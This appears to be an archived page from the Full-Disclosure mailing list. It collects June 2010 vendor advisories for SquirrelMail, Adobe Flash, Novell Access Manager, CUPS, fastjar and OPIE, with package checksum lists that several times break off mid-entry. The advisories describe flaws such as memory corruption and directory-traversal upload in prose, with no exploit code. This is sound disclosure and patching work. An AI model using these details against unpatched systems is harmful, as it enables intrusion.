[Full-disclosure] [ MDVSA-2010:120 ] squirrelmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:120 http://www.mandriva.com/security/ ___ Package : squirrelmail Date: June 21, 2010 Affected: Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerability was reported in the SquirrelMail Mail Fetch plugin, wherein (when the plugin is activated by the administrator) a user is allowed to specify (without restriction) any port number for their external POP account settings. While the intention is to allow users to access POP3 servers using non-standard ports, this also allows malicious users to effectively port-scan any server through their SquirrelMail service (especially note that when a SquirrelMail server resides on a network behind a firewall, it may allow the user to explore the network topography (DNS scan) and services available (port scan) on the inside of (behind) that firewall). As this vulnerability is only exploitable post-authentication, and better more specific port scanning tools are freely available, we consider this vulnerability to be of very low severity. It has been fixed by restricting the allowable POP port numbers (with an administrator configuration override available) (CVE-2010-1637). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1637 http://www.squirrelmail.org/security/issue/2010-06-21 ___ Updated Packages: Corporate 4.0: 51a3e991a4ba444cc5f927baf5dc3418 corporate/4.0/i586/squirrelmail-1.4.19-0.3.20060mlcs4.noarch.rpm d6bf417640fceef2b5caf24e71266854 corporate/4.0/i586/squirrelmail-ar-1.4.19-0.3.20060mlcs4.noarch.rpm e597343820dfae43280efb3acae690c4 corporate/4.0/i586/squirrelmail-bg-1.4.19-0.3.20060mlcs4.noarch.rpm 225684042f348b4ebdb2894868711ad7 corporate/4.0/i586/squirrelmail-bn-1.4.19-0.3.20060mlcs4.noarch.rpm 3b738f641fd43614dc75eebd46fc13f1 corporate/4.0/i586/squirrelmail-ca-1.4.19-0.3.20060mlcs4.noarch.rpm 54811fb2d0c575d015bb6726163b4e5f corporate/4.0/i586/squirrelmail-cs-1.4.19-0.3.20060mlcs4.noarch.rpm 878324e428255ca4788fd728cd1b89ef corporate/4.0/i586/squirrelmail-cy-1.4.19-0.3.20060mlcs4.noarch.rpm ee4a6b11f8a851275f15ffa542f1ec79 corporate/4.0/i586/squirrelmail-cyrus-1.4.19-0.3.20060mlcs4.noarch.rpm e527ef252e00bee2b60acab0eac2f62f corporate/4.0/i586/squirrelmail-da-1.4.19-0.3.20060mlcs4.noarch.rpm 4be98336feb523d18b8764d5706505dc corporate/4.0/i586/squirrelmail-de-1.4.19-0.3.20060mlcs4.noarch.rpm 6e8e62f660a0c98fa76d7b6ca94f38ac corporate/4.0/i586/squirrelmail-el-1.4.19-0.3.20060mlcs4.noarch.rpm 29b642620534160321c527ee8255b433 corporate/4.0/i586/squirrelmail-en-1.4.19-0.3.20060mlcs4.noarch.rpm 1c58c4a2cb47cf09cbeab31442b62d08 corporate/4.0/i586/squirrelmail-es-1.4.19-0.3.20060mlcs4.noarch.rpm 0b3760ad124724ad0d6f8027de009734 corporate/4.0/i586/squirrelmail-et-1.4.19-0.3.20060mlcs4.noarch.rpm e429a6f20561d768aa7ebb10e725ea6a corporate/4.0/i586/squirrelmail-eu-1.4.19-0.3.20060mlcs4.noarch.rpm a9e3def2235b0b289087ecda55f79862 corporate/4.0/i586/squirrelmail-fa-1.4.19-0.3.20060mlcs4.noarch.rpm e0ce4e898f282460516336e11a67c144 corporate/4.0/i586/squirrelmail-fi-1.4.19-0.3.20060mlcs4.noarch.rpm 340bd98cfb188d5710217e3ebe2407db corporate/4.0/i586/squirrelmail-fo-1.4.19-0.3.20060mlcs4.noarch.rpm 35bab5034ba76e7e735d6c5f234a4418 corporate/4.0/i586/squirrelmail-fr-1.4.19-0.3.20060mlcs4.noarch.rpm 20dfd5df3e9f99bd90e41c8ce120408b corporate/4.0/i586/squirrelmail-fy-1.4.19-0.3.20060mlcs4.noarch.rpm 04379ca3b61d3a2bb653c73c6fbcf66f corporate/4.0/i586/squirrelmail-he-1.4.19-0.3.20060mlcs4.noarch.rpm 83fdc58217d04a44d177d0cd0001cb8d corporate/4.0/i586/squirrelmail-hr-1.4.19-0.3.20060mlcs4.noarch.rpm cc34146ec19c37a620c7a3e36ca43b08 corporate/4.0/i586/squirrelmail-hu-1.4.19-0.3.20060mlcs4.noarch.rpm 03197f3ed0bbd8153448a67122ad corporate/4.0/i586/squirrelmail-id-1.4.19-0.3.20060mlcs4.noarch.rpm c552e63dfd8df5175cc1808f850d1cde corporate/4.0/i586/squirrelmail-is-1.4.19-0.3.20060mlcs4.noarch.rpm f9fe6c08db85bd5b8a034c63c2660a94 corporate/4.0/i586/squirrelmail-it-1.4.19-0.3.20060mlcs4.noarch.rpm 40842916100b517244663f5a5cb31f9a corporate/4.0/i586/squirrelmail-ja-1.4.19-0.3.20060mlcs4.noarch.rpm 06970a11b87b26889295a0b86aaa2e79 corporate/4.0/i586/squirrelmail-ka-1.4.19-0.3.20060mlcs4.noarch.rpm b64b80fb2ed9f97750d7a63420df4b89 corporate/4.0/i586/squirrelmail-ko-1.4.19-0.3.20060mlcs4.noarch.rpm eda2018492e8cef2a5a40ad343607945 corporate/4.0/i586/squirrelmail-lt-1.4.19-0.3.20060mlcs4.noarch.rpm
[Full-disclosure] ZDI-10-111: Adobe Flash Player LocalConnection Memory Corruption Remote Code Execution Vulnerability
ZDI-10-111: Adobe Flash Player LocalConnection Memory Corruption Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-111 June 21, 2010 -- CVE ID: CVE-2010-2188 -- Affected Vendors: Adobe -- Affected Products: Adobe Flash Player -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 9912. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the connect method exposed via the ActionScript native object number 2200. If this function is called several times with differing strings, a memory corruption issue can be triggered. This can be exploited by remote attackers to execute arbitrary code under the context of the user running the web browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb10-14.html -- Disclosure Timeline: 2010-06-02 - Vulnerability reported to vendor 2010-06-21 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-112: Novell Access Manager Arbitrary File Upload Remote Code Execution Vulnerability
ZDI-10-112: Novell Access Manager Arbitrary File Upload Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-112 June 21, 2010 -- CVE ID: CVE-2010-0284 -- Affected Vendors: Novell -- Affected Products: Novell Access Manager -- Vulnerability Details: This vulnerability allows remote attackers to upload arbitrary files on vulnerable installations of Novell Access Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the PortalModuleInstallManager component of the Novell Management Console which exists within the servlet located within nps.jar. Due to a failure to sanitize '../' directory traversal modifiers from a parameter an attacker can specify any filename to upload arbitrary contents into. Successful exploitation can result in code execution under the context of the service. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://www.novell.com/support/php/search.do?cmd=displayKCamp;docType=kcamp;externalId=7006255amp;sliceId=1amp;docTypeID=DT_TID_1_1amp;dialogID=149517296amp;stateId=0%200%20149513677, -- Disclosure Timeline: 2009-12-10 - Vulnerability reported to vendor 2010-06-21 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Stephen Fewer of Harmony Security (www.harmonysecurity.com) -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-952-1] CUPS vulnerabilities
=== Ubuntu Security Notice USN-952-1 June 21, 2010 cups, cupsys vulnerabilities CVE-2010-0540, CVE-2010-0542, CVE-2010-1748 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 8.04 LTS Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: cupsys 1.2.2-0ubuntu0.6.06.19 Ubuntu 8.04 LTS: cupsys 1.3.7-1ubuntu3.11 Ubuntu 9.04: cups1.3.9-17ubuntu3.9 Ubuntu 9.10: cups1.4.1-5ubuntu2.6 Ubuntu 10.04 LTS: cups1.4.3-1ubuntu1.2 In general, a standard system update will make all the necessary changes. Details follow: Adrian Pastor and Tim Starling discovered that the CUPS web interface incorrectly protected against cross-site request forgery (CSRF) attacks. If an authenticated user were tricked into visiting a malicious website while logged into CUPS, a remote attacker could modify the CUPS configuration and possibly steal confidential data. (CVE-2010-0540) It was discovered that CUPS did not properly handle memory allocations in the texttops filter. If a user or automated system were tricked into printing a crafted text file, a remote attacker could cause a denial of service or possibly execute arbitrary code with privileges of the CUPS user (lp). (CVE-2010-0542) Luca Carettoni discovered that the CUPS web interface incorrectly handled form variables. A remote attacker who had access to the CUPS web interface could use this flaw to read a limited amount of memory from the cupsd process and possibly obtain confidential data. (CVE-2010-1748) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.19.diff.gz Size/MD5: 115313 005b2e259ee2bc9aeb334d3b2ca51faa http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.19.dsc Size/MD5: 1061 177a2f8e4a29a35ea13fd51256f1380f http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2.orig.tar.gz Size/MD5: 4070384 2c99b8aa4c8dc25c8a84f9c06aa52e3e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-gnutls10_1.2.2-0ubuntu0.6.06.19_all.deb Size/MD5: 998 35bdefd4098d83e84274364d62ee78ae amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.19_amd64.deb Size/MD5:36246 f780e86740e595dc53b1ed5c75b55c13 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.19_amd64.deb Size/MD5:81834 4085edf21acd7cc603465d9cab24197f http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.19_amd64.deb Size/MD5: 2297664 891a2b5476e05e98e0b821fad88d0daf http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.19_amd64.deb Size/MD5: 6096 7f361fac37f34a2560226286e3f59cb4 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.19_amd64.deb Size/MD5:78160 7a84d018f2ca5b447dc647034759b0e1 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.19_amd64.deb Size/MD5:25738 dad628ebfbdc12b32325657781edd0e4 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.19_amd64.deb Size/MD5: 131420 8cf624425e00972351b02f37d150916e i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-bsd_1.2.2-0ubuntu0.6.06.19_i386.deb Size/MD5:34766 84d90801efca2b0330fccea613ce63de http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys-client_1.2.2-0ubuntu0.6.06.19_i386.deb Size/MD5:77896 158339fe207b732d69201e75cb0f3381 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/cupsys_1.2.2-0ubuntu0.6.06.19_i386.deb Size/MD5: 2263760 2eca2208b83d962a5c3c5e1fe6d4275f http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2-dev_1.2.2-0ubuntu0.6.06.19_i386.deb Size/MD5: 6094 36b6a321662416156d7260007a6ca31a http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsimage2_1.2.2-0ubuntu0.6.06.19_i386.deb Size/MD5:77288 ad80ca6edfc486db896d9eb779e0f650 http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2-dev_1.2.2-0ubuntu0.6.06.19_i386.deb Size/MD5:25744 1d533c0ab57482330ae306a7891ec6ff http://security.ubuntu.com/ubuntu/pool/main/c/cupsys/libcupsys2_1.2.2-0ubuntu0.6.06.19_i386.deb Size/MD5: 123508
[Full-disclosure] [USN-953-1] fastjar vulnerability
=== Ubuntu Security Notice USN-953-1 June 21, 2010 fastjar vulnerability CVE-2010-0831 === A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: fastjar 2:0.95-1ubuntu2.1 Ubuntu 9.04: fastjar 2:0.97-3ubuntu0.1 Ubuntu 9.10: fastjar 2:0.98-1ubuntu0.9.10.1 Ubuntu 10.04 LTS: fastjar 2:0.98-1ubuntu0.10.04.1 In general, a standard system update will make all the necessary changes. Details follow: Dan Rosenberg discovered that fastjar incorrectly handled file paths containing .. when unpacking archives. If a user or an automated system were tricked into unpacking a specially crafted jar file, arbitrary files could be overwritten with user privileges. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.95-1ubuntu2.1.diff.gz Size/MD5:14652 0bbecbfd445a41af5fac64225180626f http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.95-1ubuntu2.1.dsc Size/MD5: 688 37c0afbe767cd560f19f444c518f9e9a http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.95.orig.tar.gz Size/MD5: 593955 92a70f9e56223b653bce0f58f90cf950 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.95-1ubuntu2.1_amd64.deb Size/MD5:84840 92c639fcce37474a468a243a26a9ead6 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.95-1ubuntu2.1_i386.deb Size/MD5:45128 b0d21c6467fe96f13ed0b6c71c96fd76 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/fastjar/fastjar_0.95-1ubuntu2.1_lpia.deb Size/MD5:45394 082ac97eca4af7ed2e04576027240d98 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/f/fastjar/fastjar_0.95-1ubuntu2.1_powerpc.deb Size/MD5:47688 b5b71b34bd0d6933356e0f667be92d34 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/f/fastjar/fastjar_0.95-1ubuntu2.1_sparc.deb Size/MD5:46654 cd6104ab543567ea3b9d3af71812cb64 Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.97-3ubuntu0.1.diff.gz Size/MD5: 4303 f685e7715cc6ef5f819cb1408d4fadba http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.97-3ubuntu0.1.dsc Size/MD5: 1077 4ea02be4634886678ad56803e595a74c http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.97.orig.tar.gz Size/MD5: 676393 2659f09c2e43ef8b7d4406321753f1b2 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.97-3ubuntu0.1_amd64.deb Size/MD5:91000 834e980e9d7f6f58ee0a861f96a374f2 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.97-3ubuntu0.1_i386.deb Size/MD5:48910 416f5950f1d5f679aaf69977bdf3e893 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/f/fastjar/fastjar_0.97-3ubuntu0.1_lpia.deb Size/MD5:49010 4d5680c65c5b00559cfd11eb3d05ab18 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/f/fastjar/fastjar_0.97-3ubuntu0.1_powerpc.deb Size/MD5:50538 e2dca54f24d0c4a0adc6f8b56639a7f4 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/f/fastjar/fastjar_0.97-3ubuntu0.1_sparc.deb Size/MD5:50536 6d85158ea3212a93e5dc36ee9829d5e1 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.98-1ubuntu0.9.10.1.diff.gz Size/MD5: 4095 fa64ab3ca694288d157c37b4571a1781 http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.98-1ubuntu0.9.10.1.dsc Size/MD5: 1097 85d8021aa363a9a2ca0025b994408139 http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.98.orig.tar.gz Size/MD5: 717984 d2d264d343d4d0e1575832cc1023c3bf amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.98-1ubuntu0.9.10.1_amd64.deb Size/MD5:91004 ed7dedc416f0c2f94c9a941cbffb8f98 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/f/fastjar/fastjar_0.98-1ubuntu0.9.10.1_i386.deb Size/MD5:48924
[Full-disclosure] [USN-955-1] OPIE vulnerability
=== Ubuntu Security Notice USN-955-1 June 21, 2010 opie vulnerability CVE-2010-1938 === A security issue affects the following Ubuntu releases: Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.04: libopie-dev 2.40~dfsg-0ubuntu1.9.04.1 Ubuntu 9.10: libopie-dev 2.40~dfsg-0ubuntu1.9.10.1 Ubuntu 10.04 LTS: libopie-dev 2.40~dfsg-0ubuntu1.10.04.1 In general, a standard system update will make all the necessary changes. Details follow: Maksymilian Arciemowicz and Adam Zabrocki discovered that OPIE incorrectly handled long usernames. A remote attacker could exploit this with a crafted username and make applications linked against libopie crash, leading to a denial of service. Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie_2.40~dfsg-0ubuntu1.9.04.1.diff.gz Size/MD5: 9412 6e9e9190b066ff3ce4d79c44af2cfebe http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie_2.40~dfsg-0ubuntu1.9.04.1.dsc Size/MD5: 1139 7e1e1f2997befa10ae8cffabfa4db522 http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie_2.40~dfsg.orig.tar.gz Size/MD5: 174823 4a2be4eedcefedd106af82aa06aedd60 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/opie/libopie-dev_2.40~dfsg-0ubuntu1.9.04.1_amd64.deb Size/MD5:32852 b9c79d257b6a746d0ad07053e41d15a5 http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie-client_2.40~dfsg-0ubuntu1.9.04.1_amd64.deb Size/MD5:44898 48b0a257f368ac90c41eb3484e147b0b http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie-server_2.40~dfsg-0ubuntu1.9.04.1_amd64.deb Size/MD5:48514 d3bfc3b527faaadbd82d6ca83c2f1ca7 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/o/opie/libopie-dev_2.40~dfsg-0ubuntu1.9.04.1_i386.deb Size/MD5:31798 ed4992c032d6947a2cfea458a6ad2c51 http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie-client_2.40~dfsg-0ubuntu1.9.04.1_i386.deb Size/MD5:44102 9cddebdf2ff4e1cbca7d14e8cb15b984 http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie-server_2.40~dfsg-0ubuntu1.9.04.1_i386.deb Size/MD5:47654 688e469a8a7958453e3e205c4f3768c8 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/o/opie/libopie-dev_2.40~dfsg-0ubuntu1.9.04.1_lpia.deb Size/MD5:30716 08cb73e7ff0534a082f9a6659e0ce333 http://ports.ubuntu.com/pool/main/o/opie/opie-client_2.40~dfsg-0ubuntu1.9.04.1_lpia.deb Size/MD5:43802 219ba660fd518ba025bb044e78a3a625 http://ports.ubuntu.com/pool/main/o/opie/opie-server_2.40~dfsg-0ubuntu1.9.04.1_lpia.deb Size/MD5:47284 251588648175ef401d32d3890b30a50a powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/o/opie/libopie-dev_2.40~dfsg-0ubuntu1.9.04.1_powerpc.deb Size/MD5:33580 f585ffa422c9d61630c8d9bd4ce4dc1e http://ports.ubuntu.com/pool/main/o/opie/opie-client_2.40~dfsg-0ubuntu1.9.04.1_powerpc.deb Size/MD5:46016 e344999d7cbbf96b42322a503bc19845 http://ports.ubuntu.com/pool/main/o/opie/opie-server_2.40~dfsg-0ubuntu1.9.04.1_powerpc.deb Size/MD5:48928 a07244aee0e9e844cac51ea172a59be6 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/o/opie/libopie-dev_2.40~dfsg-0ubuntu1.9.04.1_sparc.deb Size/MD5:32112 09c04bef194c1a1e4c71cd43dd3ac537 http://ports.ubuntu.com/pool/main/o/opie/opie-client_2.40~dfsg-0ubuntu1.9.04.1_sparc.deb Size/MD5:45388 f2c093ff244a2ee6072a70cfd0fe75ca http://ports.ubuntu.com/pool/main/o/opie/opie-server_2.40~dfsg-0ubuntu1.9.04.1_sparc.deb Size/MD5:48594 4779a75bb2a444dea595c4e83726f3b3 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie_2.40~dfsg-0ubuntu1.9.10.1.diff.gz Size/MD5: 9416 1b4036959fde389a79c60555cb294082 http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie_2.40~dfsg-0ubuntu1.9.10.1.dsc Size/MD5: 1139 b15759930af9e24a9858f1912003d654 http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie_2.40~dfsg.orig.tar.gz Size/MD5: 174823 4a2be4eedcefedd106af82aa06aedd60 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/o/opie/libopie-dev_2.40~dfsg-0ubuntu1.9.10.1_amd64.deb Size/MD5:33946 bbcf3722c4eec05dcc85714bb4905519 http://security.ubuntu.com/ubuntu/pool/main/o/opie/opie-client_2.40~dfsg-0ubuntu1.9.10.1_amd64.deb Size/MD5:
[Full-disclosure] [USN-955-2] libpam-opie vulnerability
=== Ubuntu Security Notice USN-955-2 June 21, 2010 libpam-opie vulnerability CVE-2010-1938 === A security issue affects the following Ubuntu releases: Ubuntu 9.04 Ubuntu 9.10 Ubuntu 10.04 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 9.04: libpam-opie 0.21-8build1.9.04.1 Ubuntu 9.10: libpam-opie 0.21-8build2.1 Ubuntu 10.04 LTS: libpam-opie 0.21-8build3.1 In general, a standard system update will make all the necessary changes. Details follow: USN-955-1 fixed vulnerabilities in OPIE. This update provides rebuilt libpam-opie packages against the updated libopie library. Original advisory details: Maksymilian Arciemowicz and Adam Zabrocki discovered that OPIE incorrectly handled long usernames. A remote attacker could exploit this with a crafted username and make applications linked against libopie crash, leading to a denial of service. Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build1.9.04.1.diff.gz Size/MD5: 5955 68d77e8427fd1e4e6fc542bdbdecdcb8 http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build1.9.04.1.dsc Size/MD5: 1052 a6621de8231000b1cd722de1889442df http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21.orig.tar.gz Size/MD5:41624 8dffef43ddbd14512171cca5c4570207 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build1.9.04.1_amd64.deb Size/MD5:24330 f7a795c4f3662f08d14110782384ea59 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build1.9.04.1_i386.deb Size/MD5:23494 09dc94d2c3d571a4fbaa710aed7dbf1e lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libp/libpam-opie/libpam-opie_0.21-8build1.9.04.1_lpia.deb Size/MD5:23220 c695dc2d85b0f93d6a1fc03afdc8b627 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libp/libpam-opie/libpam-opie_0.21-8build1.9.04.1_powerpc.deb Size/MD5:27188 fca2d90bf1877341d4fe871292798005 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libp/libpam-opie/libpam-opie_0.21-8build1.9.04.1_sparc.deb Size/MD5:24280 dc93f7554de0791124cb9c853cb3bf32 Updated packages for Ubuntu 9.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build2.1.diff.gz Size/MD5: 5985 a9a21c66edf5da6f3efd983d9c6f8f14 http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build2.1.dsc Size/MD5: 1032 20f0a833495a08445485b8513f6f1034 http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21.orig.tar.gz Size/MD5:41624 8dffef43ddbd14512171cca5c4570207 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build2.1_amd64.deb Size/MD5:25310 3bbc38e74436df6976f3c046713a1c4a i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build2.1_i386.deb Size/MD5:24056 a8fed25799038ff959d22abab4c441bb lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libp/libpam-opie/libpam-opie_0.21-8build2.1_lpia.deb Size/MD5:23894 c427d754c78b149a2177363e8913644e powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libp/libpam-opie/libpam-opie_0.21-8build2.1_powerpc.deb Size/MD5:25358 38a5a2e4c10ceab01ac39422e58be4bc sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libp/libpam-opie/libpam-opie_0.21-8build2.1_sparc.deb Size/MD5:24646 fa87c02f217c29deb3c2d1022d0874ed Updated packages for Ubuntu 10.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build3.1.diff.gz Size/MD5: 6083 23785c595192d3614e0336d24052288e http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21-8build3.1.dsc Size/MD5: 1032 a19a8b3b2b4a9be41bd5cc05e720bd53 http://security.ubuntu.com/ubuntu/pool/main/libp/libpam-opie/libpam-opie_0.21.orig.tar.gz Size/MD5:41624 8dffef43ddbd14512171cca5c4570207 amd64 architecture (Athlon64, Opteron, EM64T Xeon):
Re: [Full-disclosure] targetted SSH bruteforce attacks
